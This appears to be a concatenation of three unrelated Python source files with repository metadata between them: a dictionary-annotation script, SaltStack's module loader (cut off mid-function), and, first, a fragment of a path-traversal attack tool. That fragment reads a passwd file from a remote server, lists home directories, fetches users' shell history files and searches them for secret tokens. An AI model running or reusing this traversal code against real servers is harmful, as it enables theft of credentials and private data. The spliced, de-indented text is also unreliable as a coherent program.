# If there isn't an equal and some sort of content, then it isn't a valid cookie, otherwise add to list of cookies
if re.search('[a-zA-Z0-9]', dircookies) and re.search('[=]', dircookies):
cookieparts = dircookies.split('=')
cookies[cookieparts[0]] = cookieparts[1]
else:
  # Check to see if the cookie has '=', if not it is malformed and we send a dummy cookie
# If so, split at the = into correct name/value pairs
if re.search('=', args['cookie']):
cookielist = args['cookie'].split('=')
cookies[cookielist[0]] = cookielist[1]
else:
cookies['dirscalate'] = 'dirscalate'
req = session.get(newLink, cookies=cookies, verify=False)
else:
req = session.get(newLink, verify=False)
# If the status code is not 200, the file was likely inaccessible so we exit
if req.status_code != 200:
print '[*] Link was inaccessible, exiting.'
exit(0)
page = req.text
lines = page.split('\n')
homedirs = []
print '[*] Building list of home directories'
for line in lines:
if re.search('^[a-zA-Z0-9]', line):
if line not in homedirs:
home = line.split(':')
if len(home) >= 6:
if home[5] is not None:
if re.search('^/[a-zA-Z0-9]', home[5]):
homedirs.append(home[5])
print '[+] Adding home directory: '+home[5]
else:
homedirs.append('/')
print '[+] Adding home directory: /'
else:
homedirs.append('/')
print '[+] Adding home directory: /'
else:
homedirs.append('/')
print '[+] Adding home directory: /'
print '[*] Checking each history file'
# Loop through each history file
for hist in history.readlines():
# Loop through each enumerated home directory
for home in homedirs:
# Build the traversal link
getfile = re.sub('^\/', '', home)
getfile = re.sub('/', separator, getfile)
traversal = buildTraversal(args['depth'], traverseType)+getfile+separator+hist.strip()
newLink = createLink(args['link'], traversal)
print '[+] Searching: '+home+separator+hist.strip()
try:
# Access the traversal link
req = ''
if args['cookie'] is not None:
req = session.get(newLink, cookies=cookies, verify=False)
else:
req = session.get(newLink, verify=False)
page = req.text
lines = page.split('\n')
treasure = []
# Load the tokens file
tokens = open(args['tokens'])
# Loop through each token
for token in tokens.readlines():
stoken = token.strip()
# Loop through each line of the history file
for line in lines:
sline = line.strip()
# If we found a match, write to a logfile
if re.search(stoken, sline, re.IGNORECASE):
if sline not in treasure:
print '[-] Found a matching token in '+home+separator+hist.strip()
writeLog(home+separator+hist.strip()+': '+sline)
treasure.append(sline)
except:
print '[-] Failed accessing history file at '+home+separator+hist.strip()
|
bsd-2-clause
| -6,577,279,926,893,694,000 | 32.165179 | 177 | 0.675283 | false |
FrankNagel/qlc
|
src/webapp/quanthistling/scripts/annotations/annotations_for_payne1989.py
|
1
|
4018
|
# -*- coding: utf8 -*-
import sys, os
sys.path.append(os.path.abspath('.'))
import re
from operator import attrgetter
import difflib
# Pylons model init sequence
import pylons.test
import logging
from quanthistling.config.environment import load_environment
from quanthistling.model.meta import Session, metadata
from quanthistling import model
import quanthistling.dictdata.books
from paste.deploy import appconfig
import functions
def annotate_head(entry):
# delete head annotations
head_annotations = [ a for a in entry.annotations if a.value in ['head', "iso-639-3", "doculect", 'boundary']]
for a in head_annotations:
Session.delete(a)
# Delete this code and insert your code
head = None
heads = []
head_start = 0
head_end = functions.get_last_bold_pos_at_start(entry)
for i in xrange(0, head_end):
if entry.fullentry[i] == '-':
entry.append_annotation(i, i+1, u'boundary', u'dictinterpretation', u"morpheme boundary")
while head_start < head_end and entry.fullentry[head_start] in ' -':
head_start += 1
while head_end > head_start and entry.fullentry[head_end-1] in ' -':
head_end -= 1
head = functions.insert_head(entry, head_start, head_end)
if head:
heads.append(head)
return heads
def annotate_translations(entry):
# delete translation annotations
trans_annotations = [ a for a in entry.annotations if a.value=='translation']
for a in trans_annotations:
Session.delete(a)
translation_start = functions.get_last_bold_pos_at_start(entry) + 1
translation_end = functions.get_first_bold_start_in_range(entry, translation_start, len(entry.fullentry))
if translation_end == -1:
translation_end = len(entry.fullentry)
match_bracket = re.search("^ ?\([^\)]*\) ?", entry.fullentry[translation_start:translation_end])
if match_bracket:
translation_start += len(match_bracket.group(0))
match_capitals = re.search("^ ?(?:PI|PE) ?", entry.fullentry[translation_start:translation_end])
if match_capitals:
translation_start += len(match_capitals.group(0))
start = translation_start
for t_start, t_end in functions.split_entry_at(entry, r'[,;] |/|$', translation_start, translation_end):
t_start, t_end, translation = functions.remove_parts(entry, t_start, t_end)
match = re.match(r'\(vr-[it]\.( irr\.)?\)|\(vt\.\)', translation)
if match:
translation = translation[len(match.group()):]
functions.insert_translation(entry, t_start, t_end, translation)
def main(argv):
bibtex_key = u"payne1989"
if len(argv) < 2:
print "call: annotations_for%s.py ini_file" % bibtex_key
exit(1)
ini_file = argv[1]
conf = appconfig('config:' + ini_file, relative_to='.')
if not pylons.test.pylonsapp:
load_environment(conf.global_conf, conf.local_conf)
# Create the tables if they don't already exist
metadata.create_all(bind=Session.bind)
dictdatas = Session.query(model.Dictdata).join(
(model.Book, model.Dictdata.book_id==model.Book.id)
).filter(model.Book.bibtex_key==bibtex_key).all()
for dictdata in dictdatas:
entries = Session.query(model.Entry).filter_by(dictdata_id=dictdata.id).all()
#entries = Session.query(model.Entry).filter_by(dictdata_id=dictdata.id,startpage=381,pos_on_page=28).all()
startletters = set()
for e in entries:
heads = annotate_head(e)
if not e.is_subentry:
for h in heads:
if len(h) > 0:
startletters.add(h[0].lower())
annotate_translations(e)
dictdata.startletters = unicode(repr(sorted(list(startletters))))
Session.commit()
if __name__ == "__main__":
main(sys.argv)
|
gpl-3.0
| 6,149,296,717,054,123,000 | 31.764706 | 115 | 0.623444 | false |
smallyear/linuxLearn
|
salt/salt/loader.py
|
1
|
51863
|
# -*- coding: utf-8 -*-
'''
We wanna be free to ride our machines without being hassled by The Man!
And we wanna get loaded!
And we wanna have a good time!
And that's what we are gonna do. We are gonna have a good time...
'''
# Import python libs
from __future__ import absolute_import
import os
import imp
import sys
import salt
import time
import logging
import inspect
import tempfile
import functools
from collections import MutableMapping
from zipimport import zipimporter
# Import salt libs
from salt.exceptions import LoaderError
from salt.template import check_render_pipe_str
from salt.utils.decorators import Depends
from salt.utils import context
import salt.utils.lazy
import salt.utils.odict
import salt.utils.event
import salt.utils.odict
# Solve the Chicken and egg problem where grains need to run before any
# of the modules are loaded and are generally available for any usage.
import salt.modules.cmdmod
# Import 3rd-party libs
import salt.ext.six as six
__salt__ = {
'cmd.run': salt.modules.cmdmod._run_quiet
}
log = logging.getLogger(__name__)
SALT_BASE_PATH = os.path.abspath(os.path.dirname(salt.__file__))
LOADED_BASE_NAME = 'salt.loaded'
# Because the cloud drivers do `from salt.cloud.libcloudfuncs import *`,
# which simplifies code readability, some unsupported functions end up in
# the drivers' module scope.
# We list the unsupported functions here; they are removed from the loaded
# modules.
LIBCLOUD_FUNCS_NOT_SUPPORTED = (
'parallels.avail_sizes',
'parallels.avail_locations',
'proxmox.avail_sizes',
'saltify.destroy',
'saltify.avail_sizes',
'saltify.avail_images',
'saltify.avail_locations',
'rackspace.reboot',
'openstack.list_locations',
'rackspace.list_locations'
)
# Will be set to pyximport module at runtime if cython is enabled in config.
pyximport = None
def static_loader(
opts,
ext_type,
tag,
pack=None,
int_type=None,
ext_dirs=True,
ext_type_dirs=None,
base_path=None,
filter_name=None,
):
funcs = LazyLoader(_module_dirs(opts,
ext_type,
tag,
int_type,
ext_dirs,
ext_type_dirs,
base_path),
opts,
tag=tag,
pack=pack,
)
ret = {}
funcs._load_all()
if filter_name:
funcs = FilterDictWrapper(funcs, filter_name)
for key in funcs:
ret[key] = funcs[key]
return ret
def _module_dirs(
opts,
ext_type,
tag,
int_type=None,
ext_dirs=True,
ext_type_dirs=None,
base_path=None,
):
sys_types = os.path.join(base_path or SALT_BASE_PATH, int_type or ext_type)
ext_types = os.path.join(opts['extension_modules'], ext_type)
ext_type_types = []
if ext_dirs:
if ext_type_dirs is None:
ext_type_dirs = '{0}_dirs'.format(tag)
if ext_type_dirs in opts:
ext_type_types.extend(opts[ext_type_dirs])
cli_module_dirs = []
# The dirs can be any module dir, or a in-tree _{ext_type} dir
for _dir in opts.get('module_dirs', []):
# Prepend to the list to match cli argument ordering
maybe_dir = os.path.join(_dir, ext_type)
if os.path.isdir(maybe_dir):
cli_module_dirs.insert(0, maybe_dir)
continue
maybe_dir = os.path.join(_dir, '_{0}'.format(ext_type))
if os.path.isdir(maybe_dir):
cli_module_dirs.insert(0, maybe_dir)
return cli_module_dirs + ext_type_types + [ext_types, sys_types]
def minion_mods(
opts,
context=None,
utils=None,
whitelist=None,
include_errors=False,
initial_load=False,
loaded_base_name=None,
notify=False,
proxy=None):
'''
Load execution modules
Returns a dictionary of execution modules appropriate for the current
system by evaluating the __virtual__() function in each module.
:param dict opts: The Salt options dictionary
:param dict context: A Salt context that should be made present inside
generated modules in __context__
:param dict utils: Utility functions which should be made available to
Salt modules in __utils__. See `utils_dir` in
salt.config for additional information about
configuration.
:param list whitelist: A list of modules which should be whitelisted.
:param bool include_errors: Deprecated flag! Unused.
:param bool initial_load: Deprecated flag! Unused.
:param str loaded_base_name: A string marker for the loaded base name.
:param bool notify: Flag indicating that an event should be fired upon
completion of module loading.
.. code-block:: python
import salt.config
import salt.loader
__opts__ = salt.config.minion_config('/etc/salt/minion')
__grains__ = salt.loader.grains(__opts__)
__opts__['grains'] = __grains__
__salt__ = salt.loader.minion_mods(__opts__)
__salt__['test.ping']()
'''
# TODO Publish documentation for module whitelisting
if context is None:
context = {}
if utils is None:
utils = {}
if proxy is None:
proxy = {}
if not whitelist:
whitelist = opts.get('whitelist_modules', None)
ret = LazyLoader(_module_dirs(opts, 'modules', 'module'),
opts,
tag='module',
pack={'__context__': context, '__utils__': utils,
'__proxy__': proxy},
whitelist=whitelist,
loaded_base_name=loaded_base_name)
ret.pack['__salt__'] = ret
# Load any provider overrides from the configuration file providers option
# Note: Providers can be pkg, service, user or group - not to be confused
# with cloud providers.
providers = opts.get('providers', False)
if providers and isinstance(providers, dict):
for mod in providers:
            # sometimes the providers option is not meant to override a module
            # but carries other configuration
try:
funcs = raw_mod(opts, providers[mod], ret)
except TypeError:
break
else:
if funcs:
for func in funcs:
f_key = '{0}{1}'.format(mod, func[func.rindex('.'):])
ret[f_key] = funcs[func]
if notify:
evt = salt.utils.event.get_event('minion', opts=opts, listen=False)
evt.fire_event({'complete': True}, tag='/salt/minion/minion_mod_complete')
return ret
def raw_mod(opts, name, functions, mod='modules'):
'''
Returns a single module loaded raw and bypassing the __virtual__ function
.. code-block:: python
import salt.config
import salt.loader
__opts__ = salt.config.minion_config('/etc/salt/minion')
testmod = salt.loader.raw_mod(__opts__, 'test', None)
testmod['test.ping']()
'''
loader = LazyLoader(_module_dirs(opts, mod, 'rawmodule'),
opts,
tag='rawmodule',
virtual_enable=False,
pack={'__salt__': functions})
# if we don't have the module, return an empty dict
if name not in loader.file_mapping:
return {}
loader._load_module(name) # load a single module (the one passed in)
return dict(loader._dict) # return a copy of *just* the funcs for `name`
def engines(opts, functions, runners):
'''
Return the master services plugins
'''
pack = {'__salt__': functions,
'__runners__': runners}
return LazyLoader(_module_dirs(opts, 'engines', 'engines'),
opts,
tag='engines',
pack=pack)
def proxy(opts, functions=None, returners=None, whitelist=None):
'''
Returns the proxy module for this salt-proxy-minion
'''
ret = LazyLoader(_module_dirs(opts, 'proxy', 'proxy'),
opts,
tag='proxy',
pack={'__salt__': functions,
'__ret__': returners})
ret.pack['__proxy__'] = ret
return ret
def returners(opts, functions, whitelist=None, context=None):
'''
Returns the returner modules
'''
if context is None:
context = {}
return LazyLoader(_module_dirs(opts, 'returners', 'returner'),
opts,
tag='returner',
whitelist=whitelist,
pack={'__salt__': functions,
'__context__': context})
def utils(opts, whitelist=None, context=None):
'''
Returns the utility modules
'''
if context is None:
context = {}
return LazyLoader(_module_dirs(opts, 'utils', 'utils', ext_type_dirs='utils_dirs'),
opts,
tag='utils',
whitelist=whitelist,
pack={'__context__': context})
def pillars(opts, functions, context=None):
'''
Returns the pillars modules
'''
if context is None:
context = {}
ret = LazyLoader(_module_dirs(opts, 'pillar', 'pillar'),
opts,
tag='pillar',
pack={'__salt__': functions,
'__context__': context})
return FilterDictWrapper(ret, '.ext_pillar')
def tops(opts):
'''
Returns the tops modules
'''
if 'master_tops' not in opts:
return {}
whitelist = list(opts['master_tops'].keys())
ret = LazyLoader(_module_dirs(opts, 'tops', 'top'),
opts,
tag='top',
whitelist=whitelist)
return FilterDictWrapper(ret, '.top')
def wheels(opts, whitelist=None):
'''
Returns the wheels modules
'''
return LazyLoader(_module_dirs(opts, 'wheel', 'wheel'),
opts,
tag='wheel',
whitelist=whitelist)
def outputters(opts):
'''
Returns the outputters modules
:param dict opts: The Salt options dictionary
:returns: LazyLoader instance, with only outputters present in the keyspace
'''
ret = LazyLoader(_module_dirs(opts, 'output', 'output', ext_type_dirs='outputter_dirs'),
opts,
tag='output')
wrapped_ret = FilterDictWrapper(ret, '.output')
# TODO: this name seems terrible... __salt__ should always be execution mods
ret.pack['__salt__'] = wrapped_ret
return wrapped_ret
def serializers(opts):
'''
Returns the serializers modules
:param dict opts: The Salt options dictionary
:returns: LazyLoader instance, with only serializers present in the keyspace
'''
return LazyLoader(_module_dirs(opts, 'serializers', 'serializers'),
opts,
tag='serializers')
def auth(opts, whitelist=None):
'''
Returns the auth modules
:param dict opts: The Salt options dictionary
:returns: LazyLoader
'''
return LazyLoader(_module_dirs(opts, 'auth', 'auth'),
opts,
tag='auth',
whitelist=whitelist,
pack={'__salt__': minion_mods(opts)})
def fileserver(opts, backends):
'''
Returns the file server modules
'''
return LazyLoader(_module_dirs(opts, 'fileserver', 'fileserver'),
opts,
tag='fileserver',
whitelist=backends)
def roster(opts, whitelist=None):
'''
Returns the roster modules
'''
return LazyLoader(_module_dirs(opts, 'roster', 'roster'),
opts,
tag='roster',
whitelist=whitelist)
def states(opts, functions, utils, whitelist=None):
'''
Returns the state modules
:param dict opts: The Salt options dictionary
:param dict functions: A dictionary of minion modules, with module names as
keys and funcs as values.
.. code-block:: python
import salt.config
import salt.loader
__opts__ = salt.config.minion_config('/etc/salt/minion')
statemods = salt.loader.states(__opts__, None, None)
'''
ret = LazyLoader(_module_dirs(opts, 'states', 'states'),
opts,
tag='states',
pack={'__salt__': functions},
whitelist=whitelist)
ret.pack['__states__'] = ret
ret.pack['__utils__'] = utils
return ret
def beacons(opts, functions, context=None):
'''
Load the beacon modules
:param dict opts: The Salt options dictionary
:param dict functions: A dictionary of minion modules, with module names as
keys and funcs as values.
'''
if context is None:
context = {}
return LazyLoader(_module_dirs(opts, 'beacons', 'beacons'),
opts,
tag='beacons',
pack={'__context__': context,
'__salt__': functions})
def search(opts, returners, whitelist=None):
'''
Returns the search modules
:param dict opts: The Salt options dictionary
:param returners: Undocumented
:param whitelist: Undocumented
'''
# TODO Document returners arg
# TODO Document whitelist arg
return LazyLoader(_module_dirs(opts, 'search', 'search'),
opts,
tag='search',
whitelist=whitelist,
pack={'__ret__': returners})
def log_handlers(opts):
'''
Returns the custom logging handler modules
:param dict opts: The Salt options dictionary
'''
ret = LazyLoader(_module_dirs(opts,
'log_handlers',
'log_handlers',
int_type='handlers',
base_path=os.path.join(SALT_BASE_PATH, 'log')),
opts,
tag='log_handlers',
)
return FilterDictWrapper(ret, '.setup_handlers')
def ssh_wrapper(opts, functions=None, context=None):
'''
Returns the custom logging handler modules
'''
if context is None:
context = {}
if functions is None:
functions = {}
return LazyLoader(_module_dirs(opts,
'wrapper',
'wrapper',
base_path=os.path.join(SALT_BASE_PATH, os.path.join('client', 'ssh'))),
opts,
tag='wrapper',
pack={'__salt__': functions, '__context__': context},
)
def render(opts, functions, states=None):
'''
Returns the render modules
'''
pack = {'__salt__': functions}
if states:
pack['__states__'] = states
ret = LazyLoader(_module_dirs(opts,
'renderers',
'render',
ext_type_dirs='render_dirs'),
opts,
tag='render',
pack=pack,
)
rend = FilterDictWrapper(ret, '.render')
if not check_render_pipe_str(opts['renderer'], rend):
err = ('The renderer {0} is unavailable, this error is often because '
'the needed software is unavailable'.format(opts['renderer']))
log.critical(err)
raise LoaderError(err)
return rend
def grain_funcs(opts):
'''
Returns the grain functions
.. code-block:: python
import salt.config
import salt.loader
__opts__ = salt.config.minion_config('/etc/salt/minion')
grainfuncs = salt.loader.grain_funcs(__opts__)
'''
return LazyLoader(_module_dirs(opts,
'grains',
'grain',
ext_type_dirs='grains_dirs'),
opts,
tag='grains',
)
def grains(opts, force_refresh=False, proxy=None):
'''
Return the functions for the dynamic grains and the values for the static
grains.
.. code-block:: python
import salt.config
import salt.loader
__opts__ = salt.config.minion_config('/etc/salt/minion')
__grains__ = salt.loader.grains(__opts__)
print __grains__['id']
'''
    # if we have no grains, let's try loading from disk (TODO: move to decorator?)
if not force_refresh:
if opts.get('grains_cache', False):
cfn = os.path.join(
opts['cachedir'],
'grains.cache.p'
)
if os.path.isfile(cfn):
grains_cache_age = int(time.time() - os.path.getmtime(cfn))
if opts.get('grains_cache_expiration', 300) >= grains_cache_age and not \
opts.get('refresh_grains_cache', False) and not force_refresh:
log.debug('Retrieving grains from cache')
try:
serial = salt.payload.Serial(opts)
with salt.utils.fopen(cfn, 'rb') as fp_:
cached_grains = serial.load(fp_)
return cached_grains
except (IOError, OSError):
pass
else:
if force_refresh:
log.debug('Grains refresh requested. Refreshing grains.')
else:
log.debug('Grains cache last modified {0} seconds ago and '
'cache expiration is set to {1}. '
'Grains cache expired. Refreshing.'.format(
grains_cache_age,
opts.get('grains_cache_expiration', 300)
))
else:
log.debug('Grains cache file does not exist.')
if opts.get('skip_grains', False):
return {}
if 'conf_file' in opts:
pre_opts = {}
pre_opts.update(salt.config.load_config(
opts['conf_file'], 'SALT_MINION_CONFIG',
salt.config.DEFAULT_MINION_OPTS['conf_file']
))
default_include = pre_opts.get(
'default_include', opts['default_include']
)
include = pre_opts.get('include', [])
pre_opts.update(salt.config.include_config(
default_include, opts['conf_file'], verbose=False
))
pre_opts.update(salt.config.include_config(
include, opts['conf_file'], verbose=True
))
if 'grains' in pre_opts:
opts['grains'] = pre_opts['grains']
else:
opts['grains'] = {}
else:
opts['grains'] = {}
grains_data = {}
funcs = grain_funcs(opts)
if force_refresh: # if we refresh, lets reload grain modules
funcs.clear()
# Run core grains
for key, fun in six.iteritems(funcs):
if not key.startswith('core.'):
continue
log.trace('Loading {0} grain'.format(key))
ret = fun()
if not isinstance(ret, dict):
continue
grains_data.update(ret)
# Run the rest of the grains
for key, fun in six.iteritems(funcs):
if key.startswith('core.') or key == '_errors':
continue
try:
ret = fun()
except Exception:
log.critical(
'Failed to load grains defined in grain file {0} in '
'function {1}, error:\n'.format(
key, fun
),
exc_info=True
)
continue
if not isinstance(ret, dict):
continue
grains_data.update(ret)
grains_data.update(opts['grains'])
# Write cache if enabled
if opts.get('grains_cache', False):
cumask = os.umask(0o77)
try:
if salt.utils.is_windows():
# Make sure cache file isn't read-only
__salt__['cmd.run']('attrib -R "{0}"'.format(cfn))
with salt.utils.fopen(cfn, 'w+b') as fp_:
try:
serial = salt.payload.Serial(opts)
serial.dump(grains_data, fp_)
except TypeError:
# Can't serialize pydsl
pass
except (IOError, OSError):
msg = 'Unable to write to grains cache file {0}'
log.error(msg.format(cfn))
os.umask(cumask)
return grains_data
# TODO: get rid of? Does anyone use this? You should use raw() instead
def call(fun, **kwargs):
'''
Directly call a function inside a loader directory
'''
args = kwargs.get('args', [])
dirs = kwargs.get('dirs', [])
funcs = LazyLoader([os.path.join(SALT_BASE_PATH, 'modules')] + dirs,
None,
tag='modules',
virtual_enable=False,
)
return funcs[fun](*args)
def runner(opts):
'''
Directly call a function inside a loader directory
'''
ret = LazyLoader(_module_dirs(opts, 'runners', 'runner', ext_type_dirs='runner_dirs'),
opts,
tag='runners',
)
# TODO: change from __salt__ to something else, we overload __salt__ too much
ret.pack['__salt__'] = ret
return ret
def queues(opts):
'''
Directly call a function inside a loader directory
'''
return LazyLoader(_module_dirs(opts, 'queues', 'queue', ext_type_dirs='queue_dirs'),
opts,
tag='queues',
)
def sdb(opts, functions=None, whitelist=None):
'''
Make a very small database call
'''
return LazyLoader(_module_dirs(opts, 'sdb', 'sdb'),
opts,
tag='sdb',
pack={'__sdb__': functions},
whitelist=whitelist,
)
def pkgdb(opts):
'''
Return modules for SPM's package database
.. versionadded:: 2015.8.0
'''
return LazyLoader(
_module_dirs(
opts,
'pkgdb',
'pkgdb',
base_path=os.path.join(SALT_BASE_PATH, 'spm')
),
opts,
tag='pkgdb'
)
def pkgfiles(opts):
'''
Return modules for SPM's file handling
.. versionadded:: 2015.8.0
'''
return LazyLoader(
_module_dirs(
opts,
'pkgfiles',
'pkgfiles',
base_path=os.path.join(SALT_BASE_PATH, 'spm')
),
opts,
tag='pkgfiles'
)
def clouds(opts):
'''
Return the cloud functions
'''
# Let's bring __active_provider_name__, defaulting to None, to all cloud
# drivers. This will get temporarily updated/overridden with a context
# manager when needed.
functions = LazyLoader(_module_dirs(opts,
'clouds',
'cloud',
base_path=os.path.join(SALT_BASE_PATH, 'cloud'),
int_type='clouds'),
opts,
tag='clouds',
pack={'__active_provider_name__': None},
)
for funcname in LIBCLOUD_FUNCS_NOT_SUPPORTED:
log.trace(
'{0!r} has been marked as not supported. Removing from the list '
'of supported cloud functions'.format(
funcname
)
)
functions.pop(funcname, None)
return functions
def netapi(opts):
'''
Return the network api functions
'''
return LazyLoader(_module_dirs(opts, 'netapi', 'netapi'),
opts,
tag='netapi',
)
def _generate_module(name):
if name in sys.modules:
return
code = "'''Salt loaded {0} parent module'''".format(name.split('.')[-1])
module = imp.new_module(name)
exec(code, module.__dict__)
sys.modules[name] = module
def _mod_type(module_path):
if module_path.startswith(SALT_BASE_PATH):
return 'int'
return 'ext'
# TODO: move somewhere else?
class FilterDictWrapper(MutableMapping):
'''
Create a dict which wraps another dict with a specific key suffix on get
This is to replace "filter_load"
'''
def __init__(self, d, suffix):
self._dict = d
self.suffix = suffix
def __setitem__(self, key, val):
self._dict[key] = val
def __delitem__(self, key):
del self._dict[key]
def __getitem__(self, key):
return self._dict[key + self.suffix]
def __len__(self):
return len(self._dict)
def __iter__(self):
for key in self._dict:
if key.endswith(self.suffix):
yield key.replace(self.suffix, '')
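# Minimal illustration (not from the original source) of how FilterDictWrapper
# behaves: lookups append the suffix, iteration strips it.
#
#     d = {'mod.render': 1, 'mod.render_sls': 2}
#     wrapped = FilterDictWrapper(d, '_sls')
#     wrapped['mod.render']   # -> 2, i.e. d['mod.render_sls']
#     list(wrapped)           # -> ['mod.render'] (only keys ending in '_sls')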
class LazyLoader(salt.utils.lazy.LazyDict):
'''
Goals here:
- lazy loading
- minimize disk usage
# TODO:
- move modules_max_memory into here
- singletons (per tag)
'''
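# Illustrative construction (a typical call site is assumed here; this is not
# part of the class itself):
#
#     loader = LazyLoader(_module_dirs(opts, 'modules', 'module'),
#                         opts,
#                         tag='modules')
#     loader['test.ping']()   # the backing module is imported on first access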
def __init__(self,
module_dirs,
opts=None,
tag='module',
loaded_base_name=None,
mod_type_check=None,
pack=None,
whitelist=None,
virtual_enable=True,
): # pylint: disable=W0231
self.inject_globals = {}
# handle opts=None before it reaches __prep_mod_opts(), which indexes into it
if opts is None:
opts = {}
self.opts = self.__prep_mod_opts(opts)
self.module_dirs = module_dirs
self.tag = tag
self.loaded_base_name = loaded_base_name or LOADED_BASE_NAME
self.mod_type_check = mod_type_check or _mod_type
self.pack = {} if pack is None else pack
if '__context__' not in self.pack:
self.pack['__context__'] = {}
self.whitelist = whitelist
self.virtual_enable = virtual_enable
self.initial_load = True
# names of modules that we don't have (errors, __virtual__, etc.)
self.missing_modules = {} # mapping of name -> error
self.loaded_modules = {} # mapping of module_name -> dict_of_functions
self.loaded_files = set() # TODO: just remove them from file_mapping?
self.disabled = set(self.opts.get('disable_{0}s'.format(self.tag), []))
self.refresh_file_mapping()
super(LazyLoader, self).__init__() # late init the lazy loader
# create all of the import namespaces
_generate_module('{0}.int'.format(self.loaded_base_name))
_generate_module('{0}.int.{1}'.format(self.loaded_base_name, tag))
_generate_module('{0}.ext'.format(self.loaded_base_name))
_generate_module('{0}.ext.{1}'.format(self.loaded_base_name, tag))
def __getitem__(self, item):
'''
Override the __getitem__ in order to decorate the returned function if we need
to last-minute inject globals
'''
func = super(LazyLoader, self).__getitem__(item)
if self.inject_globals:
return global_injector_decorator(self.inject_globals)(func)
else:
return func
def __getattr__(self, mod_name):
'''
Allow for "direct" attribute access-- this allows jinja templates to
access things like `salt.test.ping()`
'''
# if we have an attribute named that, lets return it.
try:
return object.__getattr__(self, mod_name)
except AttributeError:
pass
# otherwise we assume it's jinja template access
if mod_name not in self.loaded_modules and not self.loaded:
for name in self._iter_files(mod_name):
if name in self.loaded_files:
continue
# if we got what we wanted, we are done
if self._load_module(name) and mod_name in self.loaded_modules:
break
if mod_name in self.loaded_modules:
return self.loaded_modules[mod_name]
else:
raise AttributeError(mod_name)
def missing_fun_string(self, function_name):
'''
Return the error string for a missing function.
This can range from "not available" to "__virtual__ returned False".
'''
mod_name = function_name.split('.')[0]
if mod_name in self.loaded_modules:
return '\'{0}\' is not available.'.format(function_name)
else:
try:
reason = self.missing_modules[mod_name]
except KeyError:
return '\'{0}\' is not available.'.format(function_name)
else:
if reason is not None:
return '\'{0}\' __virtual__ returned False: {1}'.format(mod_name, reason)
else:
return '\'{0}\' __virtual__ returned False'.format(mod_name)
def refresh_file_mapping(self):
'''
refresh the mapping of the FS on disk
'''
# map of suffix to description for imp
self.suffix_map = {}
suffix_order = [] # local list to determine precedence of extensions
for (suffix, mode, kind) in imp.get_suffixes():
self.suffix_map[suffix] = (suffix, mode, kind)
suffix_order.append(suffix)
if self.opts.get('cython_enable', True) is True:
try:
global pyximport
pyximport = __import__('pyximport') # pylint: disable=import-error
pyximport.install()
# add to suffix_map so file_mapping will pick it up
self.suffix_map['.pyx'] = tuple()
except ImportError:
log.info('Cython is enabled in the options but not present '
'in the system path. Skipping Cython modules.')
# Allow for zipimport of modules
if self.opts.get('enable_zip_modules', True) is True:
self.suffix_map['.zip'] = tuple()
# allow for module dirs
self.suffix_map[''] = ('', '', imp.PKG_DIRECTORY)
# create mapping of filename (without suffix) to (path, suffix)
self.file_mapping = {}
for mod_dir in self.module_dirs:
files = []
try:
files = os.listdir(mod_dir)
except OSError:
continue
for filename in files:
try:
if filename.startswith('_'):
# skip private modules
# log messages omitted for obviousness
continue
f_noext, ext = os.path.splitext(filename)
# make sure it is a suffix we support
if ext not in self.suffix_map:
continue
if f_noext in self.disabled:
log.trace(
'Skipping {0}, it is disabled by configuration'.format(
filename
)
)
continue
fpath = os.path.join(mod_dir, filename)
# if it's a directory, allow it to be loaded
if ext == '':
# is there something __init__?
subfiles = os.listdir(fpath)
sub_path = None
for suffix in suffix_order:
init_file = '__init__{0}'.format(suffix)
if init_file in subfiles:
sub_path = os.path.join(fpath, init_file)
break
if sub_path is not None:
self.file_mapping[f_noext] = (fpath, ext)
# if we don't have it, we want it
elif f_noext not in self.file_mapping:
self.file_mapping[f_noext] = (fpath, ext)
# if we do, we only want it if the new ext has higher precedence
else:
curr_ext = self.file_mapping[f_noext][1]
#log.debug("****** curr_ext={0} ext={1} suffix_order={2}".format(curr_ext, ext, suffix_order))
if curr_ext and suffix_order.index(ext) < suffix_order.index(curr_ext):
self.file_mapping[f_noext] = (fpath, ext)
except OSError:
continue
def clear(self):
'''
Clear the dict
'''
super(LazyLoader, self).clear() # clear the lazy loader
self.loaded_files = set()
self.missing_modules = {}
self.loaded_modules = {}
# if we have been loaded before, lets clear the file mapping since
# we obviously want a re-do
if hasattr(self, 'opts'):
self.refresh_file_mapping()
self.initial_load = False
def __prep_mod_opts(self, opts):
'''
Strip out of the opts any logger instance
'''
if 'grains' in opts:
self._grains = opts['grains']
else:
self._grains = {}
if 'pillar' in opts:
self._pillar = opts['pillar']
else:
self._pillar = {}
mod_opts = {}
for key, val in list(opts.items()):
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _iter_files(self, mod_name):
'''
Iterate over all file_mapping files in order of closeness to mod_name
'''
# do we have an exact match?
if mod_name in self.file_mapping:
yield mod_name
# do we have a partial match?
for k in self.file_mapping:
if mod_name in k:
yield k
# anyone else? Bueller?
for k in self.file_mapping:
if mod_name not in k:
yield k
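# Illustrative ordering (hypothetical keys, not from a real run): with
# file_mapping keys {'grains', 'mygrains', 'other'} and mod_name 'grains' this
# yields 'grains' (exact match), then 'grains' and 'mygrains' again in the
# partial pass, and finally 'other'. Callers skip names already present in
# self.loaded_files, so the repeated exact match is harmless.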
def _reload_submodules(self, mod):
submodules = (
getattr(mod, sname) for sname in dir(mod) if
isinstance(getattr(mod, sname), mod.__class__)
)
# reload only custom "sub"modules
for submodule in submodules:
# it is a submodule if the name is in a namespace under mod
if submodule.__name__.startswith(mod.__name__ + '.'):
reload(submodule)
self._reload_submodules(submodule)
def _load_module(self, name):
mod = None
fpath, suffix = self.file_mapping[name]
self.loaded_files.add(name)
fpath_dirname = os.path.dirname(fpath)
try:
sys.path.append(fpath_dirname)
if suffix == '.pyx':
mod = pyximport.load_module(name, fpath, tempfile.gettempdir())
elif suffix == '.o':
top_mod = __import__(fpath, globals(), locals(), [])
comps = fpath.split('.')
if len(comps) < 2:
mod = top_mod
else:
mod = top_mod
for subname in comps[1:]:
mod = getattr(mod, subname)
elif suffix == '.zip':
mod = zipimporter(fpath).load_module(name)
else:
desc = self.suffix_map[suffix]
# if it is a directory, we don't open a file
if suffix == '':
mod = imp.load_module(
'{0}.{1}.{2}.{3}'.format(
self.loaded_base_name,
self.mod_type_check(fpath),
self.tag,
name
), None, fpath, desc)
# reload all submodules if necessary
if not self.initial_load:
self._reload_submodules(mod)
else:
with salt.utils.fopen(fpath, desc[1]) as fn_:
mod = imp.load_module(
'{0}.{1}.{2}.{3}'.format(
self.loaded_base_name,
self.mod_type_check(fpath),
self.tag,
name
), fn_, fpath, desc)
except IOError:
raise
except ImportError:
log.debug(
'Failed to import {0} {1}:\n'.format(
